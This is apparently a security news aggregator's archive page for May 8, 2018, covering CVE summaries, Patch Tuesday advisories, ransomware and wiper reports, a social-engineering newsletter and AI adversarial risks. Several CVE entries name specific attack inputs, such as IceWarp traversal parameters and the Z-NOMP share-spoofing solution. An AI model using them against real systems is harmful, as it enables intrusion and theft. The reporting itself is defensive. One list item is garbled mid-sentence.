Daily Archives: May 8, 2018

Google CTF 2018 is here

Google CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we paid $31,1337.00, and most importantly: you had fun playing and we had fun hosting!

Congratulations (for the second year) to the team pasten, from Israel, for scoring first place in both the quals and the finals. Also, for everyone who hasn’t played yet or wants to play again, we have open-sourced the 2017 challenges in our GitHub repository.

Hence, we are excited to announce Google CTF 2018:

  • Date and time: 00:00:01 UTC on June 23th and 24th, 2018
  • Location: Online
  • Prizes: Big checks, swag and rewards for creative write-ups
The winning teams will compete again for a spot at the Google CTF Finals later this year (more details on the Finals soon).

For beginners and veterans alike

Based on the feedback we received, we plan to have additional challenges this year where people that may be new to CTFs or security can learn about, and try their hands at, some security challenges. These will be presented in a “Quest” style where there will be a scenario similar to a real world penetration testing environment. We hope that this will give people a chance to sharpen their skills, learn something new about CTFs and security, while allowing them to see a real world value to information security and its broader impact.

We hope to virtually see you at the 3rd annual Google CTF on June 23rd 2018 at 00:00:01 UTC. Check g.co/ctf, or subscribe to our mailing list for more details, as they become available.
Why do we host these competitions?

We outlined our philosophy last year, but in short: we believe that the security community helps us better protect Google users, and so we want to nurture the community and give back in a fun way.

Thirsty for more?

There are a lot of opportunities for you to help us make the Internet a safer place:

CVE-2018-10831 (z-nomp)

Z-NOMP before 2018-04-05 has an incorrect Equihash solution verifier that allows attackers to spoof mining shares, as demonstrated by providing a solution with {x1=1,x2=1,x3=1,...,x512=1} to bypass this verifier for any blockheader. This originally affected (for example) the Bitcoin Gold and Zcash cryptocurrencies, and continued to be exploited in the wild in May 2018 against smaller cryptocurrencies.

CVE-2018-10827 (litecart)

LiteCart before 2.1.2 allows remote attackers to cause a denial of service (memory consumption) via URIs that do not exist, because public_html/logs/not_found.log grows without bound, and is loaded into memory for each request.

CVE-2018-10705 (aura)

The Owned smart contract implementation for Aurora DAO (AURA), an Ethereum ERC20 token, allows attackers to acquire contract ownership because the setOwner function is declared as public. An attacker can then conduct a lockBalances() denial of service attack.

Why Organizations Need to Secure Their Containers

Containers are revolutionizing the way that organizations deploy applications. These technologies are packages, notes Amazon Web Services (AWS), that enable teams to run applications and their code, configurations and dependencies in resource-isolated processes. As such, they allow for reduced environmental dependencies, support for micro-services and horizontal scalability, among other advantages. Containers help solve some of […]… Read More

The post Why Organizations Need to Secure Their Containers appeared first on The State of Security.

SN 662: Spectre – NextGen

This week we begin by updating the status of several ongoing security stories: Russia vs Telegram, DrupalGeddon2, and the return of RowHammer. We will conclude with MAJOR new bad news related to Spectre. We also have a new cryptomalware, Twitter's in-the-clear passwords mistake, New Android 'P' security features, a crazy service for GDPR compliance, Firefox's sponsored content plan, another million routers being attacked, More deliberately compromised JavaScript found in the wild, a new Microsoft Meltdown mistake, a comprehensive Windows command reference, and signs of future encrypted Twitter DMs.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


NBlog May 9 – security essentials

There's more than a grain of truth in the saying that complexity is the enemy of security. 

Complex systems, processes and situations are harder to analyze and control. There are more things to go wrong, more interactions, more states to consider, more factors to bear in mind. Complex things are generally more fragile, less resilient, more likely to fail or be broken. 

The same applies to security awareness and training. People can only take in so much new stuff at a time.

I've blogged before about today's information overload, people constantly working on interrupt with a million distractions. If we make our awareness stuff too hard, requiring too much time and attention from the audiences, they won't bother so we're not going to achieve much.

Two complementary awareness and training approaches to address this issue are:

  1. Break the awareness and training content into discrete chunks - bite sized pieces from which to construct the whole jigsaw; and
  2. Simplify each chunk as far as possible. Make the pieces tastier, more digestible.

So, what does that mean for our next topic? We have already decided on the chunk, and as I said yesterday, we're well on the way towards defining the scope. At the same time however we're complicating matters by stitching together incident management and business continuity management, so we need to work on simplifying the content.

An approach that usually works well for me is to visualize the topic area in the form of a mind-map with a central blob for the title and satellite blobs for each of the main aspects, breaking those down further as appropriate and making links between related parts. Sometimes it takes a couple of iterations to get down to the nitty-gritty, just the key aspects in a logical sequence that makes sense but that's pretty easy with a graphics program or indeed on paper with pencil and eraser. 

Perhaps this month I'll try condensing the topic down to its essentials on a Post-It Note-sized mind map, hopefully without having to resort to a super-fine pencil and magnifying glass. Wish me luck!

Debug Exception May Cause Unexpected Behavior

Original release date: May 08, 2018

CERT Coordination Center (CERT/CC) has released information for CVE-2018-8897 – unexpected behavior for debug exceptions. A local attacker could exploit this bug to obtain sensitive information.

NCCIC encourages users and administrators to review CERT/CC’s Vulnerability Note VU #631579 for more information and refer to operating system or software vendors for appropriate patches.

This product is provided subject to this Notification and this Privacy & Use policy.

SynAck Ransomware Adopts Doppelganging Technique To Evade Detection

Security Researchers have spotted a new and improved version of the SynAck ransomware that uses a new Process Doppelganging technique, which makes the malware hard to find and stop.

The Process Doppelgänging technique abuses built-in Windows function, i.e., NTFS Transactions and an outdated implementation of Windows process loader to launch a  malicious process where adversaries replace the memory of a legitimate process with a malicious code. This technique evades process monitoring tools and anti-virus software that a legitimate process is running.

“The main purpose of the technique is to use NTFS transactions to launch a malicious process from the transacted file so that the malicious process looks like a legitimate one,” wrote Anton Ivanov, Fedor Sinitsyn and Orkhan Mamedov, security researchers with Kaspersky Lab.

SynAck ransomware first surfaced in Sept. 2017 when it was effectively used by cybercriminals to target open or badly-secured RDP connections. After that, SynAck has matured and became more powerful and dangerous.

“First, [SynAck] checks if it’s installed in the right directory. If it’s not, it doesn’t run,” researchers noted. “Second, SynAck checks if it’s installed on a computer with a keyboard set to a certain script — in this case, Cyrillic — in which case it also does nothing.”

The latest target of the attacks observed was U.S., Kuwait, Germany, and Iran. Ransom demands can be as high as $3,000.

“The ability of the Process Doppelgänging technique to sneak malware past the latest security measures represents a significant threat; one that has, not surprisingly, quickly been seized upon by attackers,” Ivanov said, in a statement. “Our research shows how the relatively low-profile, targeted ransomware SynAck used the technique to upgrade its stealth and infection capability.”

Firewall Management Maturity Stage 2: Next Generation Firewall Management

In the second of this three-part series examining the stages of firewall management maturity, we look at next generation firewall technology.


Information Security
Leadership Insights

In the second of this three-part series examining the stages of firewall management maturity, we look at next generation firewall technology. Next generation firewalls provide tremendous value, but also present unique challenges for organizations trying to manage the technology.

Risky Business #498 — There sure is a lot of Microsoft Defender out there these days

On this week’s show we’re taking a look at some recent data out of Microsoft trumpeting its Defender antivirus install figures on Windows. They’ve got 18% market share on windows 7/9 and 50% on Win10.

For the AV and endpoint security industry Microsoft has always been the existential threat, but has the plane flown into the mountain already? We’ll speak with Securosis analyst and DisruptOps founder Rich Mogull about that in this week’s feature interview.

In this week’s sponsor interview we’re joined by the always entertaining Haroon Meer of Thinkst Canary. When we spoke Haroon had just wrapped up his first ever booth at the RSA conference. He’ll join us this week to tell us, surprisingly, that it was a really worthwhile exercise for Thinkst, but as you’ll hear he also thinks the broader industry can be a pack of dumbasses when it comes to actually marketing tech at events like RSA. If he becomes global ruler RSA booths will be gimmick-free and just show people product demos.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

BREAKING: Documents show how provincial employees misled Halifax police in the FOIPOP security failure
FTC urges Twitter users to change passwords | TheHill
Iran nuclear deal: Trump pulls US out in break with Europe allies - BBC News
Patrick Gray on Twitter: "There are teams workshopping ideas like this in Tehran right now, guaranteed. Personally I'm more worried about Iranian ICS hax. They've gotten good at that stuff.… https://t.co/XQBvRcUKw9"
Caroline O. on Twitter: "NEW: The Senate Intelligence Committee released its prelim findings into Russian targeting of election infrastructure during the 2016 election. "In a small # of states, Russian-affiliated cyber actors were in a position to, at a minimum, alter or delete voter registration data."… https://t.co/Y0GMwUZEFU"
Facebook security analyst is fired for using private data to stalk women | Ars Technica
Sources: Facebook Has Fired Multiple Employees for Snooping on Users - Motherboard
Drive-by Rowhammer attack uses GPU to compromise an Android phone | Ars Technica
Android App With 10 Million Downloads Left Users’ Photos and Audio Messages Exposed to Public - Motherboard
Hundreds of big-name sites hacked, converted into drive-by currency miners | Ars Technica
Report: Chinese government is behind a decade of hacks on software companies | Ars Technica
Over 10,000 companies downloading software vulnerable to Equifax hack
European Central Bank proposes framework to strengthen financial system’s defenses
Hysteria over Jade Helm exercise in Texas was fueled by Russians, former CIA director says | The Texas Tribune
Defector: WikiLeaks ‘Will Lie to Your Face’
SiliVaccine: Inside North Korea’s Anti-Virus - Check Point Research
You Can Finally Encrypt Slack Messages So Your Boss Can't Read Them - Motherboard
Microsoft May 2018 Patch Tuesday Fixes 67 Security Issues, Including IE Zero-Day
Vulnerabilities Affecting Over One Million Dasan GPON Routers Are Now Under Attack
He Fled a Prison in Iceland. Now It’s Good to Be Back. - The New York Times
Report: Software bug led to death in Uber’s self-driving crash | Ars Technica
Carbon Black stocks close 26 percent up on first day of public trading
Why Windows Defender Antivirus is the most deployed in the enterprise – Microsoft Secure
thinkst Thoughts...: Considering an RSAC Expo booth? Our Experience, in 5,000 words or less

Ubuntu Security Notice USN-3641-2

Ubuntu Security Notice 3641-2 - USN-3641-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 17.10. This update provides the corresponding updates for Ubuntu 12.04 ESM. Nick Peterson discovered that the Linux kernel did not properly handle debug exceptions following a MOV/POP to SS instruction. A local attacker could use this to cause a denial of service. This issue only affected the amd64 architecture. Various other issues were also addressed.

Georgia Governor Vetoes Cybersecurity Bill S.B. 315

Tripwire had serious concerns with a cybersecurity bill that was passed by the Georgia legislature in early April. It was Tripwire’s concern that the bill would actually increase cybersecurity risks by criminalizing responsible non-malicious security research. As a result, Tripwire sent a letter to Georgia Governor Nathan Deal asking him to veto the bill. As […]… Read More

The post Georgia Governor Vetoes Cybersecurity Bill S.B. 315 appeared first on The State of Security.

Cisco WebEx Recording Format Player Information Disclosure Vulnerability

A vulnerability in Cisco WebEx Recording Format (WRF) Player could allow an unauthenticated, remote attacker to access sensitive data about the application. An attacker could exploit this vulnerability to gain information to conduct additional reconnaissance attacks.

The vulnerability is due to a design flaw in Cisco WRF Player. An attacker could exploit this vulnerability by utilizing a maliciously crafted file that could bypass checks in the code and enable an attacker to read memory from outside the bounds of the mapped file.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
Security Impact Rating: Medium
CVE: CVE-2018-0288

Social-Engineer Newsletter Vol 08 – Issue 104

Vol 08 Issue 104
May 2018

In This Issue

  • Two-Factor or Not Two-Factor? Why is This a Question?
  • Social-Engineer News
  • Upcoming classes

As a member of the newsletter you have the option to OPT-IN for special offers. You can click here to do that.

Do you like FREE Stuff?

How about the first chapter of ALL OF Chris Hadnagy’s Best Selling Books

If you do, you can register to get the first chapter completely free just go over to http://www.social-engineer.com to download now!

To contribute your ideas or writing send an email to contribute@social-engineer.org

If you want to listen to our past podcasts hit up our Podcasts Page and download the latest episodes.

Our good friends at CSI Tech just put their RAM ANALYSIS COURSE ONLINE – FINALLY.

The course is designed for Hi-Tech Crime Units and other digital investigators who want to leverage RAM to acquire evidence or intelligence which may be difficult or even impossible to acquire from disk. The course does not focus on the complex structures and technology behind how RAM works but rather how an investigator can extract what they need for an investigation quickly and simply

Interested in this course? Enter the code SEORG and get an amazing 15% off!

You can also pre-order, CSI Tech CEO, Nick Furneaux’s new book, Investigating Cryptocurrencies: Understanding, Extracting, and Analyzing Blockchain Evidence now!

The team at Social-Engineer, LLC proudly uses:

A Special Thanks to:

The EFF for supporting freedom of speech

Keep Up With Us

Friend on Facebook Facebook
Follow on Twitter Twitter

Two-Factor or Not Two-Factor? Why is This a Question?

Two-factor authentication, or “2FA” as the cool kids call it, is a common form of Multi-factor authentication, or MFA. These are not new concepts. In fact, they have been around in one form or another as part of human culture for likely as long as humans started talking to each other. Some examples are asking additional questions or for additional actions being taken to properly determine whether you are who you say you are, also someone vouching for you or sponsoring your entry into some activity.

Technology companies have been slowly introducing these methods to combat online identify theft for many years. Not all forms of MFA are equal by any sense, as NIST has suggested that SMS based 2FA is not sufficient to thwart sophisticated attacks as opposed to security tokens (think Google Authenticator or Duo Mobile) and physical keys.

The Link Between SE and 2FA

How does this relate to social engineering, you ask? Well, social engineering can be used to both learn the additional authentication factors you may or may not use, and the details needed to bypass them if they are in place. While SMS is not recommended as an MFA option by NIST, stronger implementations of MFA can be a decent form of defense against otherwise successful social engineering attacks.

Where would a social engineer get details about your methods of authentication? Well, one possibility is Facebook. The collection of personal information, as described in the Cambridge Analytica stories in the news, was performed via Facebook surveys. Before that was trending, that same mechanism has been used by attackers to learn respondents’ popular security questions. Once an attacker has a bit of your personal information they may be able to leverage that to gain access to your other accounts. This further emphasizes the need for MFA on all accounts since your security questions may not be as secure as you may think.

Human-Based MFA

As a defensive mechanism, friends have told me about working mothers who rely on friends to pick up their kids from school or after-school activities using human-based MFA. These moms establish a code word that only they, their kids, and the proxy know so when someone approaches the children without knowing the code word, the children know not to trust the person. I use a similar technique when I send links to people I regularly communicate with by adding in special key words we have discussed in person to verify the link I am sending is actually from me. If those words are not in the message, I am not the one sending it. It is very effective form of MFA and simple once all parties understand the purpose.

As a security professional, I try to convey security best practices to my family and friends, but I cannot force the methods on anyone that is not willing to listen. Now, I don’t send a lot of messaging to family members online, as I don’t participate in a lot of social media and any that I do is not connected to family members. So, when I announced my participation in a charity to my family via a group SMS chat, I didn’t think twice about the message I was sending until after I sent it. It was basically written as “Hey I’m doing this thing, I wanted you to know. Check out this link.” Right after I sent it I thought to myself, “well that’s looks phishy, am I really expecting my family to just follow this link?” As I was typing out a second message explaining the weird post, to my surprise and delight, one of my siblings reached out me not in the chat and asked if I had just sent them a link. I was pretty happy that a couple of seconds of effort seemed worth it to my family, just to be sure it was ok to follow the link. That is human-based MFA at work.

MFA Really Works

Professionally, it is clear that some forms of MFA are effective against social engineering attacks that result in credential theft. This point is illustrated when comparing two recent engagements SECOM performed.

In both cases, phishing emails were sent to targeted users and, in both cases, one or more users clicked the phishing link, filled out the login form, and disclosed valid network credentials. What happens next clearly shows the value of MFA. In one case we successfully accessed email, online shared storage accounts, and sent additional phish from compromised user accounts to gain even more credentials and access to sensitive information. In the other case, we were prompted to insert “our” Ubi key to verify who we were. We didn’t have the necessary key, so no additional access was gained. Without MFA enabled we fully compromised the target, with MFA enabled we were left with credentials we could do nothing with in that moment. Back to the drawing board for us, big props to that client.

The people I talk to about enabling MFA that are not in the computer industry seem intimidated by the process to enable and use, but once they are setup it fits in with normal online activity pretty quickly. If you are curious whether the services you use have MFA options, you can typically find the setup in your account settings, usually under the security or login sections. Also, you can check this site to see which services have MFA options, and which don’t, so you can choose your services based on your desired security preferences. Once most people are accustomed to, and regularly use, MFA for all their accounts, it is much harder for a social engineer to gain access to resources via credential theft. This means attackers will have to work much harder than they need to now to access accounts.

Written By: Ryan MacDougall


As part of the newsletter group, you will be the first to receive special offers to services and products by Social-Engineer.Com.


The post Social-Engineer Newsletter Vol 08 – Issue 104 appeared first on Security Through Education.

Fighting SOC Alert Overload With Effective Threat Intelligence

Key Takeaways

  • Threat intelligence isn’t just a silo in security and has advantages to bring to many different roles in your organization.
  • Teams triaging alerts in security operations centers (SOCs) are overwhelmed with event data that has no context.
  • Threat intelligence packaged correctly for the SOC analyst can make them 10 times more productive.

The concept of threat intelligence and its potential usefulness to any business that’s serious about cybersecurity is not difficult to grasp. The more you know about potential attacks, how you might be attacked, and what those attacks will target, the better equipped you are to defend and align your resources effectively.

The difficulty seems to arise in deciding how to actually implement threat intelligence. Many cybersecurity professionals appear to be laboring under the misapprehension that intelligence can only be produced or used by an elite team of analysts dedicated to producing packaged intelligence for those at the very top of the security organization. This really couldn’t be further from the truth. Threat intelligence is not simply a siloed team or technology, but can be used by many teams, job functions, or roles in security as long as it’s delivered in the right way.

Chris Crowley is a principal instructor for the SANS Institute and specializes in training how to effectively manage security operations. He highlights how threat intelligence needs to join up across all of security:

When we’re doing threat intelligence, we have specific artifacts or outputs that we would produce: indicators of compromise, TTPs, campaign reporting, strategic threat modeling, and finally, one of the artifacts in threat intelligence should be actions that our organization is taking in order to defend its assets. This isn’t just lofting a report over the partition wall — this is making sure that we do things.

Applying Threat Intelligence to Monitoring and Triaging Alerts

One key role right at the start of the security operations center process is monitoring security alerts from SIEM, IDS, EDR, and other technologies to identify and respond to security events and incidents.

Cisco’s 2018 Security Capabilities Benchmark Study found that organizations can investigate only 56 percent of the security alerts they receive on a given day, and of the investigated alerts, 34 percent are deemed legitimate. We can reasonably assume that the volume of alerts into security operations teams contributes significantly to the number of alerts being investigated.

Cisco 2018 Security Capabilities Benchmark Study Graphic

The faster analysts can triage and make their initial investigations into alerts, the more alerts the SOC will be able to process. Applying the right kinds of intelligence aims to eliminate these challenges, helping organizations proactively defend against cyberattacks. A few of the challenges that can be overcome include:

1. Alert fatigue.

Alert fatigue is caused by a large number of frequent alarms that leads to analysts taking them less seriously — the boy who called wolf, essentially. Threat intelligence applied correctly should enable a level of automation to empower faster research and a more intimate understanding of the various alerts. Ideally, an environment with fewer but better alerts is created to improve the effectiveness with which the security team can provide threat analysis.

2. High volumes of alerts and only internal information.

Often, SOCs encounter the problem of too much information with relatively little to no context. Usually, this information comes from simply looking at the telemetry of network devices and log files, setting up rules to examine anomalous behavior, and other rule sets that deliver a high quantity of raw data. Threat intelligence should be situation-specific advice to more effectively provide context to the data and subsequently implement a strategic response. To enable even faster triage, this intelligence should make its own reasonable assumption about what kind of risk a particular indicator presents. Recorded Future does this by providing a real-time risk score.

3. There’s a lot of external data but it’s hard to find intelligence.

It can be incredibly time consuming for an analyst using manual methods (googling, security news sites, favorited blogs, etc.) to find useful external information. Threat intelligence solutions should help analysts by giving not just fast access to intelligence from this range of sources, but also consolidate that intelligence into a single readable view. The more consumable this intelligence is, the more useful it becomes to teams under significant time constraints.

Recorded Future has previously tested the power of threat intelligence in speeding up SOC analyst efficiency. Our independent test shows that applying real-time threat intelligence powered by machine learning cuts analyst time to triage a security event from a firewall log from three minutes to 1.2 seconds on average, resulting in a 10 times gain in productivity.

And it’s not just SOC analysts that have something to gain. Take a look at our new white paper, “Busting Threat Intelligence Myths: A Guide for Security Professionals” to get an understanding of the difference threat intelligence can make in every role of security.

The post Fighting SOC Alert Overload With Effective Threat Intelligence appeared first on Recorded Future.


Wipers – Destruction as a means to an end

This whitepaper post is authored by Vitor Ventura and with contributions from Martin Lee

In a digital era when everything and everyone is connected, malicious actors have the perfect space to perform their activities. During the past few years, organizations have suffered several kinds of attacks that arrived in many shapes and forms. But none have been more impactful than wiper attacks. Attackers who deploy wiper malware have a singular purpose of destroying or disrupting systems and/or data.
Unlike malware that holds data for ransom (ransomware), when a malicious actor decides to use a wiper in their activities, there is no direct financial motivation. For businesses, this often is the worst kind of attack, since there is no expectation of data recovery.
Another crucial aspect of a wiper attack is the fear, uncertainty and doubt that it generates. In the past, wiper attacks have been used by malicious actors with a dual purpose: Generate social destabilization while sending a public message, while also destroying all traces of their activities.
A wiper's destructive capability can vary, ranging from the overwriting of specific files, to the destruction of the entire filesystem. The amount of data impacted will be a direct consequence of the technique used. Which, of course, will have direct impact on the business — the harder the data/system recovery process becomes, the bigger the business impact.
The defense against these attacks often falls back to the basics. By having certain protections in place — a tested cyber security incident response plan, a risk-based patch management program, a tested and cyber security-aware business continuity plan, and network and user segmentation on top of the regular software security stack — an organization dramatically increases its resilience against these kind of attacks.

Download the full whitepaper here.

CVE-2017-2606 (jenkins)

Jenkins before versions 2.44, 2.32.2 is vulnerable to an information exposure in the internal API that allows access to item names that should not be visible (SECURITY-380). This only affects anonymous users (other users legitimately have access) that were able to get a list of items via an UnprotectedRootAction.

CVE-2015-1503 (mail_server)

Multiple directory traversal vulnerabilities in IceWarp Mail Server before 11.2 allow remote attackers to read arbitrary files via a (1) .. (dot dot) in the file parameter to a webmail/client/skins/default/css/css.php page or .../. (dot dot dot slash dot) in the (2) script or (3) style parameter to webmail/old/calendar/minimizer/index.php.

Georgia governor vetoes bill that would criminalize good-faith security research, permit vigilante action

The governor of Georgia, Nathan Deal, has vetoed SB 315, the controversial bill that would have criminalized many forms of routine security research, and legalized vigilante action by victims of cybercrime (so-called "hack back").

In a statement, the governor wrote, "while intending to protect against online breaches and hacks, SB 315 may inadvertently hinder the ability of government and private industries to do so."

The veto sends the bill back to the Georgia legislature, which may try to override Deal's veto. "It is my hope that legislators will work with the cyber security and law enforcement communities moving forward to develop a comprehensive policy that promotes national security, protects online information, and continues to advance Georgia’s position as a leader in the technology industry," the governor added.

To read this article in full, please click here

Goldman Sells In-House Cybersecurity Software to Tech Company Product combines threat intelligence and investigation


Product combines threat intelligence and investigation

Bloomberg, By Yalman Onaran, May 7, 2018

Goldman Sachs Group Inc. is selling cybersecurity software it developed to a company that specializes in that market in exchange for an equity stake.

LookingGlass Cyber Solutions will buy the Sentinel platform from Goldman Sachs, according to executives at both companies. The software combines intelligence — gathering data on potential threats — with investigation of possible breaches, a combination that makes it attractive to other financial institutions, the executives said, declining to provide more details on the terms of the transaction.

Security systems like Sentinel require constant upgrading and maintenance, jobs more suited to a technology company than an investment bank, Andy Ozment, chief information security officer at Goldman Sachs, said in an interview. LookingGlass is better positioned to develop it for other companies to use, he said.

“We’ve had interest from other financial institutions for Sentinel,” Ozment said. “But it’s one thing to write software to use yourself and quite another thing to write something that anybody can take and install on their systems.”

LookingGlass has close to 300 clients worldwide, with banks and government agencies making up the bulk.

Sentinel is a “phenomenal piece of software” that will be appealing to clients even outside financial services, Chief Executive Officer Chris Coleman said in an interview.

Goldman has a history of selling off technology originally developed for internal use. In 2013, it sold a majority stake in its electronic-trading platform, Redi, to other Wall Street firms to open it up to more brokers and their clients. It sold software that lets employees access sensitive information on mobile devices to Synchronoss Technologies Inc. in 2015.

Source: https://www.bloomberg.com/news/articles/2018-05-07/goldman-sells-in-house-cybersecurity-software-to-tech-company

The post Goldman Sells In-House Cybersecurity Software to Tech Company Product combines threat intelligence and investigation appeared first on LookingGlass Cyber Solutions Inc..

VERT Threat Alert: May 2018 Patch Tuesday Analysis

Today’s VERT Alert addresses Microsoft’s May 2018 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-777 on Wednesday, May 9th. In-The-Wild & Disclosed CVEs CVE-2018-8120 This privilege escalation vulnerability affecting Win32k could allow an attacker to execute code in kernel mode. According to Microsoft, the newest OS releases […]… Read More

The post VERT Threat Alert: May 2018 Patch Tuesday Analysis appeared first on The State of Security.

CVE-2018-6921 (freebsd)

In FreeBSD before 11.1-STABLE(r332066) and 11.1-RELEASE-p10, due to insufficient initialization of memory copied to userland in the network subsystem, small amounts of kernel memory may be disclosed to userland processes. Unprivileged authenticated local users may be able to access small amounts of privileged kernel data.

CVE-2018-6920 (freebsd)

In FreeBSD before 11.1-STABLE(r332303), 11.1-RELEASE-p10, 10.4-STABLE(r332321), and 10.4-RELEASE-p9, due to insufficient initialization of memory copied to userland in the Linux subsystem and Atheros wireless driver, small amounts of kernel memory may be disclosed to userland processes. Unprivileged authenticated local users may be able to access small amounts of privileged kernel data.

CVE-2018-10812 (bitcoin_wallet)

The Bitpie application through 3.2.4 for Android and iOS uses cleartext storage for digital currency initial keys, which allows local users to steal currency by leveraging root access to read /com.biepie/shared_prefs/com.bitpie_preferences.xml (on Android) or a plist file in the app data folder (on iOS).

The AI’ker’s Guide to the (cybersecurity) Galaxy

As a security veteran I find myself from time to time having to explain to newbies the importance of adopting a hacker’s way of thinking’, and the difference between hacker’s and builder’s thinking.

If you can’t think like an attacker, how are you going to build solutions to defend against them? For the last 4 years I was involved in several research projects (most successful but some not so much) aimed at incorporating AI technology into Imperva products. The most significant challenge we had to cope with was making sure that our use of AI worked safely in adversarial settings; assuming that adversaries are out there, investing their brain power in understanding our solutions and adapting to them, polluting training data and trying to sneak through security mechanisms.

In recent years we’ve seen a surge in Artificial Intelligence technology being incorporated into almost every aspect of our lives. Having made remarkable leaps forward in areas like visual object recognition, semantic segmentation, and speech recognition, it’s only natural to see other industries race to adopt AI as their solution to, well… everything really.

The Security Lifecycle

Unsurprisingly, most vendors using AI don’t think of security. I remember one of the most interesting DefCon sessions I’ve seen: a research on the security of smart traffic sensors. Researcher Cesar Cerrudo saw a scene in a movie where hackers cleared a route of green lights through traffic and wondered whether this was possible. The answer was, of course, yes. In probing this ecosystem for security mechanisms to circumvent, Cerrudo wasn’t able to find any.  What he did find, however, was a disturbingly easy way to take control of sensors buried in the roads and how to disable them.

I remember this session not because of the sophisticated hacking techniques used, but because it reminded me of a meeting with a large car manufacturer I had a few years earlier. As they started venturing further into the digitization of automotive systems – moving from purely mechanical systems into a wired/wireless network of digital devices, connected to external entities like garages and service centers – they discovered severe vulnerabilities and new cyber threats to the industry, with potentially lethal results.

This is the unfortunate, but inevitable security lifecycle of new technologies – closely tied to the Gartner hype-cycle. In its early days, the community talks innovation and opportunity, expectations and excitement couldn’t be higher. Then comes disillusionment. Once security researchers find ways to make the system do things it wasn’t supposed to, in particular, if the drops of vulnerabilities turn into a flood, the excitement is replaced with FUD – fear, uncertainty and doubt around the risk associated with the new technology.

Just like automotive systems and smart cities, there are no security exceptions when it comes to AI.

When it comes to security, AI is no different than other technologies. Analyzing a system designed without considering what attackers look for, it’s likely that the attacker will find ways to make that system do things it’s not supposed to. Some of you might be familiar with Google research from 2015, where they added human-invisible noise to an image of a school bus and had the AI classify it as an ostrich; more recently, research into the same field produced some pretty interesting new applications based on the 2015 exercise.

The Houdini framework was able to fool pose estimation, speech recognition and semantic segmentation AI. Facial recognition, used in many control and surveillance systems – like those used in airports –, was completely confused by colorful glasses with deliberately embedded patterns meant to puzzle the system. Next-Gen Anti-Virus software using AI for malware detection was circumvented by another AI in a super-cool bot vs. bot research, presented at Blackhat last year. Several bodies of research show that in many cases, AI deception has transferability, where deceptive samples for model A, are found to be effective against another model ‘A’ that solves the same problem.

It’s not all doom and gloom

That was the bad news, the good news is that AI can be used safely. Our product portfolio uses AI technology is used extensively to improve protection against a variety of threats against web applications and data systems. We do this effectively and, perhaps most important, safely. Based on our experience, I’ve gathered some guidelines for safe usage of AI.

While these are not binary rules, we find these guidelines effective in estimating the risk associated with using AI due to adversarial behavior.

  1. Opt for robust models – when using non-robust AI models, small insignificant differences in the input may have a significant impact on the model decision. Using non-robust models allows attackers to generate same-essence different-look input, which is essential to most attacks.
  2. Choose explainable models – in many cases AI This situation is optimal from the attacker’s perspective. The deception is expressed only in the decision, reducing the chances of someone noticing that something doesn’t look right with the decision.
  3. Training data sanitization – data used for training the model must be sanitized, assuming that an attacker may have control over part of it. Sanitization in most cases means filtering out suspicious data.
  4. Internal use – Input: consider reducing the influence of the attacker on the data entering the AI
  5. Internal usage – Output: opt for AI in functions where the output is not exposed to the attackers, reducing the attacker’s ability to learn whether a deception attempt was successful.
  6. Threat Detection – opt for positive security: when using AI for threat detection, choose a positive security model. Negative security models exonerate everything except what was identified as a known attack, usually based on specific attack patterns. This model is susceptible to deception if the attacker is able to modify the input looks without impacting its essence. Positive security models by nature are more robust, giving the attacker much less slackness and reducing his chances to find a same-essence different-look input that will get undetected.
  7. Threat Detection — combine with other mechanisms: when using in a negative security model, use AI as another detection layer, aimed at detecting threats that pass other “less intelligent” security mechanisms, and not as the sole measure.

What is a Chief Security Officer (CSO)? Understanding this critical role

A CSO is a departmental leader responsible for information security, corporate security or both. That's the simplest answer to the question "What is a CSO?", and one that our founding editor Derek Slater offered up to readers way back in 2005 — heck, if there's one website you ought to be able to trust to tell you what a CSO is, it's CSOonline. But of course, no one-sentence answer can encapsulate the complexity of a job like this, and not everyone with the CSO title has the same set of responsibilities.

The title Chief Security Officer (CSO) was first used principally inside the information technology function to designate the person responsible for IT security. At many companies, the term CSO is still used in this way. Chief Information Security Officer (CISO) is perhaps a more accurate description of this position, and today the CISO title is becoming more prevalent for leaders with an exclusive information security focus.

To read this article in full, please click here

What is a Chief Security Officer? Understanding this critical role

A CSO is a departmental leader responsible for information security, corporate security or both. That's the simplest answer to the question "What is a CSO?", and one that our founding editor Derek Slater offered up to readers way back in 2005 — heck, if there's one website you ought to be able to trust to tell you what a CSO is, it's CSOonline. But of course, no one-sentence answer can encapsulate the complexity of a job like this, and not everyone with the CSO title has the same set of responsibilities.

The title Chief Security Officer (CSO) was first used principally inside the information technology function to designate the person responsible for IT security. At many companies, the term CSO is still used in this way. Chief Information Security Officer (CISO) is perhaps a more accurate description of this position, and today the CISO title is becoming more prevalent for leaders with an exclusive information security focus.

To read this article in full, please click here

Microsoft Patch Tuesday – May 2018

Today, Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 67 new vulnerabilities, with 21 of them rated critical, 42 of them rated important, and four rated as low severity. These vulnerabilities impact Outlook, Office, Exchange, Edge, Internet Explorer and more.

In addition to the 67 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180008, which addresses the vulnerability CVE-2018-4944 described in the Adobe security bulletin APSB18-16.

Critical Vulnerabilities

This month, Microsoft is addressing 21 vulnerabilities that are rated as critical. Talos believes one of these is notable and requires prompt attention.

CVE-2018-8174 - Windows VBScript Engine Remote Code Execution Vulnerability.
A remote code execution vulnerability exists in the VBScript scripting engine (vbscript.dll) of Windows. This vulnerability allows an attacker to include malicious VBScript within a website or embedded within an Office file, which when executed allows an attacker to execute arbitrary code in the context of the current user. Threat actors are currently exploiting this vulnerability.

Other vulnerabilities rated as critical are listed below:

CVE-2018-0959 - Hyper-V Remote Code Execution Vulnerability
CVE-2018-0961 - Hyper-V vSMB Remote Code Execution Vulnerability
CVE-2018-8115 - Windows Host Compute Service Shim Remote Code Execution Vulnerability
